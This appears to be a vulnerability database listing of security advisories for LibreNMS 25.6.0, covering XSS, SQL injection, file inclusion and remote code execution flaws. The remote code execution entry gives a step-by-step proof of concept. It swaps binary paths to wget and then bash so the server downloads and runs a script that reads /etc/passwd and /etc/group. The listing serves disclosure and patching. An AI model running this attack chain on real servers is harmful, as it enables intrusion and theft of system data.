| purl | pkg:composer/librenms/librenms@25.6.0 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
| VCID-2t5k-atx8-eycd (Aliases: CVE-2026-26992, GHSA-93fx-g747-695x) | LibreNMS /port-groups name Stored Cross-Site Scripting<br>**/port-groups name Stored Cross-Site Scripting**<br>- HTTP POST<br>- Request-URI(s): "/port-groups"<br>- Vulnerable parameter(s): "name"<br>- Attacker must be authenticated with "admin" privileges.<br>- When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.<br>- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete. | Affected by 2 other vulnerabilities. |
| VCID-5vg7-7y5w-muhw (Aliases: CVE-2025-68614, GHSA-c89f-8g7g-59wj) | Please find POC file here: https://trendmicro-my.sharepoint.com/:u:/p/kholoud_altookhy/IQCfcnOE5ykQSb6Fm-HFI872AZ_zeIJxU-3aDk0jh_eX_NE?e=zkN76d<br>ZDI-CAN-28575: LibreNMS Alert Rule API Cross-Site Scripting Vulnerability<br>**CVSS:** 4.3 (AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L)<br>**Abstract:** Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products: LibreNMS - LibreNMS<br>**Vulnerability details:**<br>- Version tested: 25.10.0<br>- Installer file: NA<br>- Platform tested: NA | Affected by 10 other vulnerabilities. |
| VCID-7f5s-p5u4-abhh (Aliases: CVE-2026-6204, GHSA-pr3g-phhr-h8fh) | LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write<br>**Summary:** A vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By modifying the binary path settings for built-in network tools and bypassing an input filter, an attacker with administrative privileges can download and execute malicious payloads.<br>**Details:** The application allows administrative users to configure the absolute binary paths for network diagnostic tools at `/settings/external/binaries`. This setting is not sufficiently validated to ensure the paths remain restricted to safe, intended executables. These tools are invoked by sending a request to the `GET /ajax/netcmd` endpoint. While there is an existing input filter designed to restrict arguments to valid IP addresses or hostnames, this filter can be bypassed.<br>**PoC:** To reproduce this vulnerability, a remote HTTP server should be hosted with a malicious script/executable; ensure the remote server is reachable by the server running LibreNMS. The PoC will use the file `malicious.sh` containing the following content. It will return the content of /etc/passwd and /etc/group, the current working directory, the username that is running the script, and it will list the files of the current directory.<br>`#!/usr/bin/env bash`<br>`cat /etc/passwd`<br>`cat /etc/group`<br>`whoami`<br>`pwd`<br>`ls`<br>1. Host a remote HTTP server that the server can reach and place the malicious script on the remote server. For demonstration, I will start it on localhost. ![image](https://github.com/user-attachments/assets/ef235f8e-089b-462c-b12c-7b5ae2037fc5)<br>2. Make sure the malicious script `malicious.sh` can be downloaded. ![image](https://github.com/user-attachments/assets/60b04755-e824-4384-81f2-2feacdc8e273)<br>3. Login with an admin account and navigate to Global Settings -> External -> Binary Locations. ![image](https://github.com/user-attachments/assets/f914cc9e-f45b-444f-8f16-058101d84576)<br>4. Change the whois binary path to the path of wget (e.g. /usr/bin/wget). ![image](https://github.com/user-attachments/assets/57fbf033-ff07-41dc-9bac-2f3b3e897ea6)<br>5. Send the request `GET /ajax/netcmd?cmd=whois&query={remote http server's ip address}/malicious.sh`. The response should contain wget's output, and malicious.sh would be downloaded by the server. ![image](https://github.com/user-attachments/assets/942b6082-18db-4838-b06c-b98d7fa1f8d0)<br>6. After that, change the whois binary path to the path of bash (e.g. /bin/bash). ![image](https://github.com/user-attachments/assets/0c11d86e-0dab-4780-bdb7-f328bbb758f8)<br>7. Send the request `GET /ajax/netcmd?cmd=whois&query=malicious.sh` to execute the script. ![image](https://github.com/user-attachments/assets/d4dcf8e9-5a75-407c-8dd4-96d11f090dbe)<br>**Impact:** This vulnerability allows a malicious actor to achieve Remote Code Execution (RCE), potentially leading to complete system compromise, data exfiltration, or lateral movement within the network.<br>**Remediation Advice:** Loading the binary path from a config file instead of exposing the setting in the WebUI can eliminate this issue. If that is not possible, enforcing more validation and fixing the `ip_or_hostname` bypass in https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169 would reduce the risk of RCE.<br>**Prerequisite:** The attacker must have a valid Administrator account to exploit this vulnerability. | Affected by 0 other vulnerabilities. |
| VCID-7s6j-vmn5-p7eh (Aliases: GHSA-7549-ggpq-22w8) | Duplicate Advisory: LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write<br>**Duplicate Advisory:** This advisory has been withdrawn because it is a duplicate of GHSA-pr3g-phhr-h8fh. This link is maintained to preserve external references.<br>**Original Description:** LibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web server. | Affected by 0 other vulnerabilities. |
| VCID-8ks5-6azh-67ed (Aliases: CVE-2025-62412, GHSA-6g2v-66ch-6xmh) | LibreNMS alert-rules has a Cross-Site Scripting Vulnerability<br>**Product:** LibreNMS<br>**Vendor:** LibreNMS<br>**Vulnerability Type:** Cross-Site Scripting (XSS)<br>**CVSS Score:** 4.3 (AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L)<br>**Affected Version:** 25.8.0 (latest at time of discovery)<br>**POC File:** [Download POC](https://trendmicro-my.sharepoint.com/:u:/p/kholoud_altookhy/EQYQOiGddUtOtz6739YUFU4B5FkNob_TvKBYEA8P6lSRQw?e=lDOR5W)<br>**Ticket:** ZDI-CAN-28105: LibreNMS Alert Rules Cross-Site Scripting Vulnerability | Affected by 13 other vulnerabilities. |
| VCID-8nsn-f1fc-6ucm (Aliases: CVE-2025-54138, GHSA-gq96-8w38-hhj2) | LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE<br>LibreNMS 25.6.0 contains an architectural vulnerability in the `ajax_form.php` endpoint that permits Remote File Inclusion based on user-controlled POST input. The application directly uses the `type` parameter to dynamically include `.inc.php` files from the trusted path `includes/html/forms/`, without validation or allowlisting:<br>`if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {`<br>`include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';`<br>`}`<br>This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.<br>_This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory._ | Affected by 16 other vulnerabilities. |
| VCID-99dx-dees-2fg3 (Aliases: CVE-2025-65014, GHSA-5mrf-j8v6-f45g) | LibreNMS has Weak Password Policy<br>A **Weak Password Policy** vulnerability was identified in the user management functionality of the _LibreNMS_ application. This vulnerability allows administrators to create accounts with extremely weak and predictable passwords, such as `12345678`. This exposes the platform to brute-force and credential stuffing attacks. | Affected by 10 other vulnerabilities. |
| VCID-appm-zs6z-v3b2 (Aliases: CVE-2026-26991, GHSA-5pqf-54qp-32wx) | LibreNMS /device-groups name Stored Cross-Site Scripting<br>**/device-groups name Stored Cross-Site Scripting**<br>- HTTP POST<br>- Request-URI(s): "/device-groups"<br>- Vulnerable parameter(s): "name"<br>- Attacker must be authenticated with "admin" privileges.<br>- When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter.<br>- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete. | Affected by 2 other vulnerabilities. |
| VCID-bfnn-xz3r-sfcv (Aliases: CVE-2025-62365, GHSA-86rg-8hc8-v82p) | LibreNMS is vulnerable to Reflected-XSS in `report_this` function<br>Reflected-XSS in `report_this` function in `librenms/includes/functions.php` | Affected by 16 other vulnerabilities. |
| VCID-h5y9-mrn4-q7br (Aliases: CVE-2026-26990, GHSA-79q9-wc6p-cf92) | LibreNMS has a Time-Based Blind SQL Injection in address-search.inc.php<br>A time-based blind SQL injection vulnerability exists in `address-search.inc.php` via the `address` parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. | Affected by 2 other vulnerabilities. |
| VCID-hj1w-rpxt-4ygp (Aliases: CVE-2025-65013, GHSA-j8cq-7f6p-256x) | LibreNMS vulnerable to Reflected Cross-Site Scripting (XSS) in endpoint `/maps/nodeimage` parameter `Image Name`<br>A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the LibreNMS application at the `/maps/nodeimage` endpoint. The `Image Name` parameter is reflected in the HTTP response without proper output encoding or sanitization, allowing an attacker to craft a URL that, when visited by a victim, causes arbitrary JavaScript execution in the victim's browser. | Affected by 10 other vulnerabilities. |
| VCID-kkqd-nzsw-23cr (Aliases: CVE-2025-65093, GHSA-6pmj-xjxp-p8g9) | LibreNMS is vulnerable to SQL Injection (Boolean-Based Blind) in hostname parameter in ajax_output.php endpoint<br>A **Boolean-Based Blind SQL Injection** vulnerability was identified in the LibreNMS application at the `/ajax_output.php` endpoint. The `hostname` parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses. | Affected by 10 other vulnerabilities. |
| VCID-mchv-4jpx-audc (Aliases: CVE-2026-26987, GHSA-gqx7-99jw-6fpr) | LibreNMS affected by reflected XSS via email field<br>Reflected XSS via email field | Affected by 2 other vulnerabilities. |
| VCID-rq5b-4ktu-syf3 (Aliases: CVE-2026-27016, GHSA-fqx6-693c-f55g) | LibreNMS has a Stored XSS in Custom OID - unit parameter missing strip_tags()<br>The `unit` parameter in Custom OID functionality lacks `strip_tags()` sanitization while other fields (`name`, `oid`, `datatype`) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping, allowing Stored XSS. | Affected by 2 other vulnerabilities. |
| VCID-t5mk-a8n2-rkcg (Aliases: CVE-2026-26989, GHSA-6xmx-xr9p-58p7) | LibreNMS has a Stored XSS in Alert Rule<br>A stored Cross-Site Scripting (XSS) vulnerability exists in LibreNMS (<= 25.12.0) in the creation of Alert Rules. This allows a user with the admin role to inject malicious JavaScript, which will be executed when the alert rules page is viewed. | Affected by 2 other vulnerabilities. |
| VCID-uzy1-yh5d-dqbt (Aliases: CVE-2025-55296, GHSA-vxq6-8cwm-wj99) | LibreNMS allows stored XSS in Alert Template name field<br>A stored Cross-Site Scripting (XSS) vulnerability exists in LibreNMS (<= 25.6.0) in the Alert Template creation feature. This allows a user with the **admin role** to inject malicious JavaScript, which will be executed when the template is rendered, potentially compromising other admin accounts. | Affected by 15 other vulnerabilities.<br>Affected by 0 other vulnerabilities. |
| VCID-y5mq-m57f-b3bx (Aliases: CVE-2026-26988, GHSA-h3rv-q4rq-pqcv) | LibreNMS: SQL Injection in ajax_table.php spreads through a covert data stream.<br>**SQL Injection in IPv6 Address Search functionality via `address` parameter**<br>A SQL injection vulnerability exists in the `ajax_table.php` endpoint. The application fails to properly sanitize or parameterize user input when processing IPv6 address searches. Specifically, the `address` parameter is split into an address and a prefix, and the prefix portion is directly concatenated into the SQL query string without validation. This allows an attacker to inject arbitrary SQL commands, potentially leading to unauthorized data access or database manipulation. | Affected by 2 other vulnerabilities. |
| VCID-z744-37t6-pud6 (Aliases: CVE-2025-62411, GHSA-frc6-pwgr-c28w) | LibreNMS has a Stored XSS vulnerability in its Alert Transport name field<br>LibreNMS <= 25.8.0 contains a **Stored Cross-Site Scripting (XSS)** vulnerability in the Alert Transports management functionality. When an administrator creates a new Alert Transport, the value of the `Transport name` field is stored and later rendered in the **Transports** column of the **Alert Rules** page without proper input validation or output encoding. This leads to arbitrary JavaScript execution in the admin's browser. | Affected by 13 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | | |